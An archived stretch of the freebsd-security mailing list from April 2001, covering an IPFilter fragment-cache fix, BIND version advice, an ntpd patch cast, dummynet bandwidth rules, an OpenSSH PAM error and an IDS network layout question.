((tcp->th_flags & TH_SYN == TH_SYN) && ! (tdata->td_maxwin == 0)) tdata->td_maxwin = 1; } else if (((tcp->th_flags & (TH_ACK|TH_RST)) == (TH_ACK|TH_RST)) && (ack == 0)) { *************** *** 1021,1027 **** fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --- 1022,1028 ---- fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --ELM986576202-7114-0_-- ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 15:19:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id EB07437B43C for ; Fri, 6 Apr 2001 15:19:49 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: named question To: security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 6 Apr 2001 17:19:46 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 04/06/2001 05:10:39 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Which is recommended: named-8.2.3-T6B (FreeBSD 4.2) or named-8.2.3-REL from ISC George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 15:21:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id A907637B42C for ; Fri, 6 Apr 2001 15:21:46 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id E400B1360C; Fri, 6 Apr 2001 18:22:16 -0400 (EDT) Date: Fri, 6 Apr 2001 18:22:16 -0400 From: Chris Faulhaber To: George.Giles@mcmail.vanderbilt.edu Cc: security@freebsd.org Subject: Re: named question Message-ID: <20010406182216.B12260@peitho.fxp.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="uQr8t48UFsdbeI+V" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Apr 06, 2001 at 05:19:46PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --uQr8t48UFsdbeI+V Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Apr 06, 2001 at 05:19:46PM -0500, George.Giles@mcmail.vanderbilt.ed= u wrote: > Which is recommended: >=20 > named-8.2.3-T6B (FreeBSD 4.2) or > named-8.2.3-REL from ISC >=20 Check out ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:1= 8.bind.asc 8.2.3-REL (for the impatient) --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --uQr8t48UFsdbeI+V Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrOQZgACgkQObaG4P6BelCssgCfSkGZ3gbCNm0kG7oY1D5sya6A bY8AoJ+wYaKebSY6HL1/eKdRUTqTCMmY =IOle -----END PGP SIGNATURE----- --uQr8t48UFsdbeI+V-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 15:22:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id B0A1737B422 for ; Fri, 6 Apr 2001 15:22:35 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org ([64.183.199.40]) by poontang.schulte.org (8.12.0.Beta5/8.12.0.Beta5) with ESMTP id f36MMWIr078907; Fri, 6 Apr 2001 17:22:32 -0500 (CDT) Message-Id: <5.0.2.1.0.20010406172021.00ac9428@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Fri, 06 Apr 2001 17:22:05 -0500 To: George.Giles@mcmail.vanderbilt.edu, security@FreeBSD.ORG From: Christopher Schulte Subject: Re: named question In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:19 PM 4/6/2001 -0500, George.Giles@mcmail.vanderbilt.edu wrote: >Which is recommended: > >named-8.2.3-T6B (FreeBSD 4.2) or >named-8.2.3-REL from ISC ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:18.bind.asc 8.2.3-REL is absolutely suggested. >George > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 17: 0:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from sj-msg-core-1.cisco.com (sj-msg-core-1.cisco.com [171.71.163.11]) by hub.freebsd.org (Postfix) with ESMTP id 16C1537B443 for ; Fri, 6 Apr 2001 17:00:11 -0700 (PDT) (envelope-from bmah@cisco.com) Received: from bmah-freebsd-0.cisco.com (bmah-freebsd-0.cisco.com [171.70.84.42]) by sj-msg-core-1.cisco.com (8.9.3/8.9.1) with ESMTP id RAA27357; Fri, 6 Apr 2001 17:00:15 -0700 (PDT) Received: (from bmah@localhost) by bmah-freebsd-0.cisco.com (8.11.3/8.11.1) id f3700AD10168; Fri, 6 Apr 2001 17:00:10 -0700 (PDT) (envelope-from bmah) Message-Id: <200104070000.f3700AD10168@bmah-freebsd-0.cisco.com> X-Mailer: exmh version 2.3.1 01/19/2001 with nmh-1.0.4 To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: URGENT: Serious bug in IPFilter (fwd) In-Reply-To: <200104062135.f36LZpt67966@cwsys.cwsent.com> References: <200104062135.f36LZpt67966@cwsys.cwsent.com> Comments: In-reply-to Cy Schubert - ITSD Open Systems Group message dated "Fri, 06 Apr 2001 14:35:14 -0700." From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_867176716P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 06 Apr 2001 17:00:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_867176716P Content-Type: text/plain; charset=us-ascii If memory serves me right, Cy Schubert - ITSD Open Systems Group wrote: > Should we be updating IP Filter in our source tree before 4.3-RELEASE? > This sounds like a serious bug. It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet AFAIK: darrenr@FreeBSD.org said: > darrenr 2001/04/06 08:52:29 PDT > Modified files: > sys/netinet ip_frag.c ip_frag.h ip_nat.c ip_nat.h > ip_state.c > Log: > fix security hole created by fragment cache > Revision Changes Path > 1.15 +26 -5 src/sys/netinet/ip_frag.c > 1.12 +5 -3 src/sys/netinet/ip_frag.h > 1.22 +5 -3 src/sys/netinet/ip_nat.c > 1.15 +2 -1 src/sys/netinet/ip_nat.h > 1.21 +3 -3 src/sys/netinet/ip_state.c Bruce. --==_Exmh_867176716P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.2 06/23/2000 iD8DBQE6zliK2MoxcVugUsMRArEtAJ4jgKqouX2NHuOXbHPGFZ5UkeOM7wCg2poq iWrnytrNGZJljBMIdLeHa8o= =ckzN -----END PGP SIGNATURE----- --==_Exmh_867176716P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 22:29:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id 1036A37B43C for ; Fri, 6 Apr 2001 22:29:30 -0700 (PDT) (envelope-from razor@ldc.ro) Received: (qmail 8225 invoked by uid 666); 7 Apr 2001 05:29:13 -0000 Date: Sat, 7 Apr 2001 08:29:13 +0300 From: Alex Popa To: Garrett Wollman Cc: Brian Somers , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010407082913.A8159@ldc.ro> References: <20010406035459.A6350@nagual.pp.ru> <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060038.UAA73318@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104060038.UAA73318@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Thu, Apr 05, 2001 at 08:38:02PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 08:38:02PM -0400, Garrett Wollman wrote: > < said: > > > I believe the int is correct. > > You are mistaken. The purpose of the cast is to defeat the automatic > promotion from `char' to `int', which causes sign-extension if `char' > is signed. Casting to `unsigned char' prevents this from happening. AFAIK, the casts are applied *after* the default promtions. The only solution to defeating sign extension is to *declare* unsigned char. > > -GAWollman > ------------+------------------------------------------ Alex Popa, | "Artificial Intelligence is razor@ldc.ro| no match for Natural Stupidity" ------------+------------------------------------------ "It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 23:44:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id DD98737B422; Fri, 6 Apr 2001 23:44:20 -0700 (PDT) (envelope-from avalon@cairo.anu.edu.au) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id QAA24197; Sat, 7 Apr 2001 16:44:12 +1000 (EST) From: Darren Reed Message-Id: <200104070644.QAA24197@cairo.anu.edu.au> Subject: Re: URGENT: Serious bug in IPFilter (fwd) To: bmah@FreeBSD.ORG Date: Sat, 7 Apr 2001 16:44:12 +1000 (Australia/NSW) Cc: Cy.Schubert@uumail.gov.bc.ca (Cy Schubert - ITSD Open Systems Group), freebsd-security@FreeBSD.ORG In-Reply-To: <200104070000.f3700AD10168@bmah-freebsd-0.cisco.com> from "Bruce A. Mah" at Apr 06, 2001 05:00:10 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Bruce A. Mah, sie said: > > --==_Exmh_867176716P > Content-Type: text/plain; charset=us-ascii > > If memory serves me right, Cy Schubert - ITSD Open Systems Group wrote: > > Should we be updating IP Filter in our source tree before 4.3-RELEASE? > > This sounds like a serious bug. > > It looks like darrenr committed a fix to HEAD, but it's not MFC-ed yet > AFAIK: This has since happened with jkh's approval. Hmmm, maybe I should have mentioned that in the commit (doh!) Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 0:13:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.unila.ac.id (ns1.unila.ac.id [202.158.47.162]) by hub.freebsd.org (Postfix) with SMTP id A585D37B424 for ; Sat, 7 Apr 2001 00:13:21 -0700 (PDT) (envelope-from riki@maiser.unila.ac.id) Received: (qmail 4778 invoked from network); 7 Apr 2001 07:16:10 -0000 Received: from maiser.unila.ac.id (192.168.1.2) by ns1.unila.ac.id with SMTP; 7 Apr 2001 07:16:10 -0000 Received: from localhost (riki@localhost) by maiser.unila.ac.id (8.9.3/8.9.3) with ESMTP id OAA22182 for ; Sat, 7 Apr 2001 14:11:34 +0700 (JAVT) (envelope-from riki@maiser.unila.ac.id) Date: Sat, 7 Apr 2001 14:11:34 +0700 (JAVT) From: Q Yai QQ To: freebsd-security@FreeBSD.org Subject: OOT :Bandwith limiter In-Reply-To: <200104070644.QAA24197@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hai guys,. i heard that dummnynet can help us to manage bandwith,.. i wanna try it,. so give me some tutorial please,.. how should i do,.. and can u give me some example command for it,.. by the way,. how about security is dummynet has ipfw rules ?? does it will make user got a problem to access,.. and,. does it secure like Firewall?? i dunno,. so please hel me guys,. thank's alot >>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<< riki@unila.ac.id visit my homepage and sign my guestbook http://unilanet.unila.ac.id/~qq --------------------------------------- --------------------------------------- & __& &__ // \\ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 1: 1:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 5FC9337B424 for ; Sat, 7 Apr 2001 01:01:28 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id LAA22355; Sat, 7 Apr 2001 11:55:06 +0400 (MSD) Date: Sat, 7 Apr 2001 11:55:06 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.49) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <133590773347.20010407115506@sandy.ru> To: Q Yai QQ Cc: freebsd-security@FreeBSD.org Subject: Re: OOT :Bandwith limiter In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Q Yai QQ, 07.04.2001 11:11, you wrote: OOT :Bandwith limiter; Q> hai guys,. Q> i heard that dummnynet can help us to manage bandwith,.. Q> i wanna try it,. Q> so give me some tutorial please,.. man dummynet ~/3APA3A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 7: 1: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx3.port.ru (mx3.port.ru [194.67.23.37]) by hub.freebsd.org (Postfix) with ESMTP id 3D19C37B43F for ; Sat, 7 Apr 2001 07:00:56 -0700 (PDT) (envelope-from rakukin@mail.ru) Received: from f8.int ([10.0.0.76] helo=f8.mail.ru) by mx3.port.ru with esmtp (Exim 3.14 #54) id 14ltGk-0007NB-00 for security@freebsd.org; Sat, 07 Apr 2001 18:00:50 +0400 Received: from mail by f8.mail.ru with local (Exim 3.14 #54) id 14ltGj-000C45-00 for security@freebsd.org; Sat, 07 Apr 2001 18:00:50 +0400 Received: from [194.85.224.35] by koi.mail.port.ru with HTTP; Sat, 07 Apr 2001 14:00:50 +0000 (GMT) From: "A. Rakukin" To: security@freebsd.org Subject: openssh problem Mime-Version: 1.0 X-Mailer: mPOP Web-Mail 2.19 X-Originating-IP: 194.85.229.130 via proxy [194.85.224.35] Reply-To: "A. Rakukin" Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Message-Id: Date: Sat, 07 Apr 2001 18:00:50 +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I have a problem with ssh. When I run additional sshd to port 540 (the primary sshd works perfect) it gives an error while allocating tty (it tries to allocate /dev/ttyp0, whether it is busy or not -- does not matter). What could be the problem? Error log and sshd_config follow. Please copy your reply, I am not subscribed. Alex >sshd -df config debug1: sshd version OpenSSH_2.3.0 debug1: read DSA private key done debug1: Bind to port 540 on 0.0.0.0. Server listening on 0.0.0.0 port 540. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from HOST.domain port 1002 Connection from ip.address.of.HOST port 1002 debug1: Client protocol version 1.5; client software version OpenSSH_2.2.0 debug1: match: OpenSSH_2.2.0 pat ^OpenSSH[-_]2\.[012] debug1: Local version string SSH-1.99-OpenSSH_2.3.0 debug1: Sent 768 bit public key and 1024 bit host key. debug1: Encryption type: 3des debug1: Received session key; encryption turned on. debug1: Installing crc compensation attack detector. debug1: Starting up PAM with username "USER" debug1: Attempting authentication for USER. debug1: Trying rhosts with RSA host authentication for client user USER debug1: Rhosts RSA authentication: canonical host HOST.domain Rhosts with RSA host authentication accepted for USER, USER on HOST.domain. Accepted rhosts-rsa for USER from ip.address.of.HOST port 1002 ruser USER debug1: session_new: init debug1: session_new: session 0 debug1: Allocating pty. debug1: PAM setting tty to "/dev/ttyp0" debug1: do_pam_session: euid 0, uid 0 fatal: PAM session setup failed[6]: Permission denied debug1: Calling cleanup 0x80545d8(0x807b480) debug1: pty_cleanup_proc: /dev/ttyp0 debug1: Calling cleanup 0x8058150(0x0) Cannot close PAM session[6]: Permission denied debug1: Calling cleanup 0x805e480(0x0) Port 540 ListenAddress 0.0.0.0 HostKey /etc/ssh/ssh_host_key HostDsaKey /etc/ssh/ssh_host_dsa_key ServerKeyBits 768 LoginGraceTime 120 KeyRegenerationInterval 3600 PermitRootLogin no IgnoreRhosts no StrictModes yes X11Forwarding yes X11DisplayOffset 150 PrintMotd yes KeepAlive yes SyslogFacility DAEMON LogLevel INFO RhostsAuthentication no RhostsRSAAuthentication yes RSAAuthentication yes DSAAuthentication yes PasswordAuthentication no PermitEmptyPasswords no SkeyAuthentication no UseLogin no CheckMail yes Subsystem sftp /usr/libexec/sftp-server MaxStartups 10:30:60 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 7:57:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id D78B937B43F for ; Sat, 7 Apr 2001 07:57:48 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id RAA18117 for ; Sat, 7 Apr 2001 17:10:51 +0100 Message-Id: <200104071610.RAA18117@mailgate.kechara.net> Date: Sat, 07 Apr 2001 16:00:40 +0100 To: freebsd-security@freebsd.org From: Lee Smallbone Subject: Theory Question Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: multipart/mixed;; boundary="_OPERAB__-snRvxGpQZy4mJNr+rjvg5d" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d Content-Type: text/plain; charset="us-ascii"; Hi there, I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot be 'hacked' (externally), is this true in the real world? The setup would look a little like this. (my apologies to those of you who do not have fixed-width fonts. See attachment if they're allowed here) /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x Would the direct link to the Internal network pose a threat to the rest of the Internal Lan? Bearing in mind the IDS wouldn't have an IP address? Any input appreciated. -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d Content-Disposition: attachment; filename="layout.txt" Content-Type: text/plain; name="layout.txt" /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x /------\ /Internet\-----[router]-------[switch]----[various servers] / \ | | ------------ | | | | [IDS] | | [firewall] | | | | | | \ [switch] \ / \ \ / \ \ / \ \ / \ \ / [internal lan] \ / 192.168.1.x [IDS Log 2] 192.168.1.x --_OPERAB__-snRvxGpQZy4mJNr+rjvg5d-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 8:28:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 2177237B43C for ; Sat, 7 Apr 2001 08:28:32 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from cascade (cascade.veldy.net [192.168.0.1]) by veldy.net (Postfix) with SMTP id 6C961BA40; Sat, 7 Apr 2001 10:27:14 -0500 (CDT) Message-ID: <003801c0bf77$21848400$0100a8c0@cascade> From: "Thomas T. Veldhouse" To: "Q Yai QQ" , References: Subject: Re: OOT :Bandwith limiter Date: Sat, 7 Apr 2001 10:26:34 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Here is a simple example: fwcmd="/sbin/ipfw" host="10.0.0.1" # bandwidth limiting rules ${fwcmd} add pipe 1 tcp from ${host} to any 25 via dc1 in ${fwcmd} pipe 1 config bw 20KBytes/s This will limit outgoing mail on SMTP port 25. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Q Yai QQ" To: Sent: Saturday, April 07, 2001 2:11 AM Subject: OOT :Bandwith limiter > > hai guys,. > > i heard that dummnynet can help us to manage bandwith,.. > i wanna try it,. > so give me some tutorial please,.. > how should i do,.. > and can u give me some example command for it,.. > > by the way,. how about security > is dummynet has ipfw rules ?? > does it will make user got a problem to access,.. > and,. does it secure like Firewall?? > > i dunno,. so please hel me guys,. > > thank's alot > > > > > >>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<< > riki@unila.ac.id > visit my homepage and sign my guestbook > http://unilanet.unila.ac.id/~qq > --------------------------------------- > --------------------------------------- > & > __& &__ > // \\ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 8:52:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 5896537B42C; Sat, 7 Apr 2001 08:52:11 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (rlzvzr@localhost [127.0.0.1]) by green.dyndns.org (8.11.2/8.11.1) with ESMTP id f37Fosa31021; Sat, 7 Apr 2001 11:50:55 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200104071550.f37Fosa31021@green.dyndns.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: lee@kechara.net Cc: freebsd-security@FreeBSD.org Subject: Re: Theory Question In-Reply-To: Message from Lee Smallbone of "Sat, 07 Apr 2001 16:00:40 BST." <200104071610.RAA18117@mailgate.kechara.net> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 07 Apr 2001 11:50:54 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lee Smallbone wrote: > Hi there, > > I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently > it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second > machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run > stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot > be 'hacked' (externally), is this true in the real world? > > The setup would look a little like this. > > > (my apologies to those of you who do not have fixed-width fonts. See attachment if they're allowed here) > > /------\ > /Internet\-----[router]-------[switch]----[various servers] > / \ | | > ------------ | | > | | > [IDS] | > | [firewall] > | | > | | > | | > \ [switch] > \ / \ > \ / \ > \ / \ > \ / \ > \ / [internal lan] > \ / 192.168.1.x > [IDS Log 2] > 192.168.1.x > > > Would the direct link to the Internal network pose a threat to the rest of the Internal Lan? > Bearing in mind the IDS wouldn't have an IP address? > > Any input appreciated. How is the IDS logging to another machine without any IP address? To do it in a reasonable way, give it two network interfaces, one on the outside and one on the inside. The IDS machine needs to have no form of bridging enabled, of course, and have the public interface used for sniffing to have no address of its own. The IDS acts enough like a firewall (passing nothing that's not its own through) to stick the IDS's other interface directly on the internal switch. The IDS logging machine can be off the same switch and then wouldn't need two network cards like it did in the design you propose. Also, if all your router would be doing there is mirroring traffic in and out to the IDS, you may want to think more carefully about whether you really need both that router and that switch there. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 10: 3:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id EC2FA37B42C for ; Sat, 7 Apr 2001 10:03:45 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id TAA77626; Sat, 7 Apr 2001 19:03:42 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: George.Giles@mcmail.vanderbilt.edu Cc: security@FreeBSD.ORG Subject: Re: named question References: From: Dag-Erling Smorgrav Date: 07 Apr 2001 19:03:42 +0200 In-Reply-To: George.Giles@mcmail.vanderbilt.edu's message of "Fri, 6 Apr 2001 17:19:46 -0500" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org George.Giles@mcmail.vanderbilt.edu writes: > Which is recommended: > > named-8.2.3-T6B (FreeBSD 4.2) or > named-8.2.3-REL from ISC named-8.2.3 (FreeBSD 4-STABLE). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 12:20:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id DCBF937B422 for ; Sat, 7 Apr 2001 12:20:22 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (598 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 7 Apr 2001 14:19:32 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sat, 7 Apr 2001 14:19:31 -0500 (CDT) From: James Wyatt To: Lee Smallbone Cc: freebsd-security@freebsd.org Subject: Re: Theory Question In-Reply-To: <200104071610.RAA18117@mailgate.kechara.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In practice, not a question... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 13:17: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from bootp-20-219.bootp.virginia.edu (bootp-20-219.bootp.Virginia.EDU 